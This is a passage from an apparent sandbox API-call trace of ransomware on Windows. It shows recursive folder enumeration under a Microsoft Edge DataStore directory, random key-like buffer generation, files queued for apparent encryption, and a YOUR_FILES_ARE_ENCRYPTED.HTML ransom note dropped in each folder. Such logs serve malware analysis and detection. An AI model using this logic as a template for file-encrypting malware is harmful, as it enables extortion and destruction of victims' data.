ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4a5e718, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="edbtmp.log", cAlternateFileName="")) returned 1 [0116.302] StrStrIW (lpFirst="edbtmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.302] wnsprintfW (in: pszDest=0x30c0058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log") returned 179 [0116.302] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0116.302] lstrlenW (lpString=".log") returned 4 [0116.302] PathFindExtensionW (pszPath="edbtmp.log") returned=".log" [0116.302] SystemFunction036 (in: RandomBuffer=0x19c5b8, RandomBufferLength=0x20 | out: RandomBuffer=0x19c5b8) returned 1 [0116.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\120712-0049\\dbstore\\logfiles\\edbtmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0116.303] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19c5dc | out: lpFileSize=0x19c5dc*=524288) returned 1 [0116.303] GetProcessHeap () returned 0x600000 [0116.303] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0116.305] wsprintfW (in: param_1=0x19c4f6, param_2="%02X" | out: param_1="87") returned 2 [0116.305] wsprintfW (in: param_1=0x19c4fa, param_2="%02X" | out: param_1="E4") returned 2 [0116.305] wsprintfW (in: param_1=0x19c4fe, param_2="%02X" | out: param_1="AB") returned 2 [0116.305] wsprintfW (in: param_1=0x19c502, param_2="%02X" | out: param_1="4E") returned 2 [0116.305] wsprintfW (in: param_1=0x19c506, param_2="%02X" | out: param_1="46") returned 2 [0116.305] wsprintfW (in: param_1=0x19c50a, param_2="%02X" | out: param_1="53") returned 2 [0116.305] wsprintfW (in: param_1=0x19c50e, param_2="%02X" | out: param_1="D2") returned 2 [0116.306] wsprintfW (in: param_1=0x19c512, param_2="%02X" | out: param_1="49") returned 2 [0116.306] wsprintfW (in: param_1=0x19c516, param_2="%02X" | out: param_1="95") returned 2 [0116.306] wsprintfW (in: param_1=0x19c51a, param_2="%02X" | out: param_1="15") returned 2 [0116.306] wsprintfW (in: param_1=0x19c51e, param_2="%02X" | out: param_1="5A") returned 2 [0116.306] wsprintfW (in: param_1=0x19c522, param_2="%02X" | out: param_1="D8") returned 2 [0116.306] wsprintfW (in: param_1=0x19c526, param_2="%02X" | out: param_1="74") returned 2 [0116.306] wsprintfW (in: param_1=0x19c52a, param_2="%02X" | out: param_1="0F") returned 2 [0116.306] wsprintfW (in: param_1=0x19c52e, param_2="%02X" | out: param_1="DA") returned 2 [0116.306] wsprintfW (in: param_1=0x19c532, param_2="%02X" | out: param_1="A3") returned 2 [0116.306] wsprintfW (in: param_1=0x19c536, param_2="%02X" | out: param_1="4A") returned 2 [0116.306] wsprintfW (in: param_1=0x19c53a, param_2="%02X" | out: param_1="A6") returned 2 [0116.306] wsprintfW (in: param_1=0x19c53e, param_2="%02X" | out: param_1="4F") returned 2 [0116.306] wsprintfW (in: param_1=0x19c542, param_2="%02X" | out: param_1="BE") returned 2 [0116.306] wsprintfW (in: param_1=0x19c546, param_2="%02X" | out: param_1="C1") returned 2 [0116.306] wsprintfW (in: param_1=0x19c54a, param_2="%02X" | out: param_1="20") returned 2 [0116.306] wsprintfW (in: param_1=0x19c54e, param_2="%02X" | out: param_1="9F") returned 2 [0116.306] wsprintfW (in: param_1=0x19c552, param_2="%02X" | out: param_1="20") returned 2 [0116.306] wsprintfW (in: param_1=0x19c556, param_2="%02X" | out: param_1="99") returned 2 [0116.306] wsprintfW (in: param_1=0x19c55a, param_2="%02X" | out: param_1="B4") returned 2 [0116.306] wsprintfW (in: param_1=0x19c55e, param_2="%02X" | out: param_1="B6") returned 2 [0116.306] wsprintfW (in: param_1=0x19c562, param_2="%02X" | out: param_1="E2") returned 2 [0116.306] wsprintfW (in: param_1=0x19c566, param_2="%02X" | out: param_1="C5") returned 2 [0116.306] wsprintfW (in: param_1=0x19c56a, param_2="%02X" | out: param_1="86") returned 2 [0116.306] wsprintfW (in: param_1=0x19c56e, param_2="%02X" | out: param_1="65") returned 2 [0116.306] wsprintfW (in: param_1=0x19c572, param_2="%02X" | out: param_1="7B") returned 2 [0116.307] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\edbtmp.log" [0116.307] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.307] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0116.307] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19c610 | out: lpFindFileData=0x19c610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4a5e718, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x6b4210, dwReserved1=0x318d3f8, cFileName="edbtmp.log", cAlternateFileName="")) returned 0 [0116.307] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.307] wnsprintfW (in: pszDest=0x30c0058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 198 [0116.307] GetProcessHeap () returned 0x600000 [0116.307] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\LogFiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\120712-0049\\dbstore\\logfiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0116.309] WriteFile (in: hFile=0x330, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19c8dc, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19c8dc*=0x3c00, lpOverlapped=0x0) returned 1 [0116.310] CloseHandle (hObject=0x330) returned 1 [0116.310] GetProcessHeap () returned 0x600000 [0116.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.310] GetProcessHeap () returned 0x600000 [0116.310] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c0058 | out: hHeap=0x600000) returned 1 [0116.310] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x48e101d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName="spartan.edb", cAlternateFileName="")) returned 1 [0116.310] StrStrIW (lpFirst="spartan.edb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.310] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\spartan.edb") returned 171 [0116.310] PathFindExtensionW (pszPath="spartan.edb") returned=".edb" [0116.310] lstrlenW (lpString=".edb") returned 4 [0116.310] PathFindExtensionW (pszPath="spartan.edb") returned=".edb" [0116.311] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43374eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x48e101d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x318d520, dwReserved1=0x318d3f0, cFileName="spartan.edb", cAlternateFileName="")) returned 0 [0116.311] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.311] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 189 [0116.311] GetProcessHeap () returned 0x600000 [0116.311] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\DBStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\120712-0049\\dbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0116.311] WriteFile (in: hFile=0x310, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19cbf0, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19cbf0*=0x3c00, lpOverlapped=0x0) returned 1 [0116.312] CloseHandle (hObject=0x310) returned 1 [0116.312] GetProcessHeap () returned 0x600000 [0116.312] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.312] GetProcessHeap () returned 0x600000 [0116.312] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0116.314] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4311257, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x43374eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x43374eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311bec8, cFileName="DBStore", cAlternateFileName="")) returned 0 [0116.314] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.314] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 181 [0116.314] GetProcessHeap () returned 0x600000 [0116.314] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\120712-0049\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\120712-0049\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0116.315] WriteFile (in: hFile=0x334, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19cf04, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19cf04*=0x3c00, lpOverlapped=0x0) returned 1 [0116.316] CloseHandle (hObject=0x334) returned 1 [0116.316] GetProcessHeap () returned 0x600000 [0116.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.316] GetProcessHeap () returned 0x600000 [0116.316] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0116.317] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4311257, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4311257, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bfc8, dwReserved1=0x311bec0, cFileName="120712-0049", cAlternateFileName="120712~1")) returned 0 [0116.317] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.317] wnsprintfW (in: pszDest=0x6a0358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 169 [0116.317] GetProcessHeap () returned 0x600000 [0116.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\nouser1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\nouser1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0116.317] WriteFile (in: hFile=0x328, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d218, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d218*=0x3c00, lpOverlapped=0x0) returned 1 [0116.318] CloseHandle (hObject=0x328) returned 1 [0116.318] GetProcessHeap () returned 0x600000 [0116.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.318] GetProcessHeap () returned 0x600000 [0116.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a0358 | out: hHeap=0x600000) returned 1 [0116.320] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="nouser1", cAlternateFileName="")) returned 0 [0116.320] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.320] wnsprintfW (in: pszDest=0x690350, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 161 [0116.320] GetProcessHeap () returned 0x600000 [0116.320] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0116.320] WriteFile (in: hFile=0x308, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d52c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d52c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.321] CloseHandle (hObject=0x308) returned 1 [0116.322] GetProcessHeap () returned 0x600000 [0116.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.322] GetProcessHeap () returned 0x600000 [0116.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x690350 | out: hHeap=0x600000) returned 1 [0116.322] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="Indexed", cAlternateFileName="")) returned 1 [0116.322] StrStrIW (lpFirst="Indexed", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.322] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed") returned 134 [0116.322] GetProcessHeap () returned 0x600000 [0116.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x690350 [0116.322] lstrcpyW (in: lpString1=0x690350, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed" [0116.322] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\*" [0116.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\*", lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.322] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="..", cAlternateFileName="")) returned 1 [0116.322] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="Data", cAlternateFileName="")) returned 1 [0116.322] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.323] wnsprintfW (in: pszDest=0x690350, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data") returned 139 [0116.323] GetProcessHeap () returned 0x600000 [0116.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a0358 [0116.323] lstrcpyW (in: lpString1=0x6a0358, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data" [0116.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\*" [0116.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\*", lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1336, dwReserved1=0x6f1228, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, 